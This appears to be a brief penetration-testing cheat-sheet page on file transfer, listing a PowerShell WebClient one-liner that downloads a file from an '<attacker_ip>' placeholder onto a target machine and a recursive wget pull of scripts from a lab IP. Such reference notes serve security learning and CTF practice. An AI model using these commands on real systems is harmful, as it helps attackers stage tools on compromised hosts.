๐File Transfer
PowerShell Download
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<attacker_ip>/<filename>','C:\<target_path>\<filename>')"Wget Download
wget http://10.10.13.49/uploads/scripts/ -r --no-parentLast updated